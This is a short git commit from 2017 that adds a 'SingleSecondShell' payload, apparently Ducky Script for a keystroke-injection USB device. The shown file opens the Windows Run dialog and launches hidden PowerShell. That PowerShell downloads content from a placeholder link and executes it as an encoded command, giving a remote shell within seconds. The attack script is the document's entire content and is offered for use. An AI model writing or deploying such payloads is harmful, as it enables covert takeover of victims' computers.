Added SingleSecondShell payload (#115)

* Add files via upload

* Update readme.md
This commit is contained in:
0xCoto
2017-04-07 08:45:09 +03:00
committed by Sebastian Kinne
parent 34003917ee
commit 741b4a67e5
3 changed files with 63 additions and 0 deletions

View File

@@ -0,0 +1,6 @@
DELAY 2000
GUI r
DELAY 200
STRING powershell -windowstyle hidden $u='YOUR_LINK';$r=Invoke-WebRequest -Uri $u;powershell -nop -e $r.content
DELAY 100
ENTER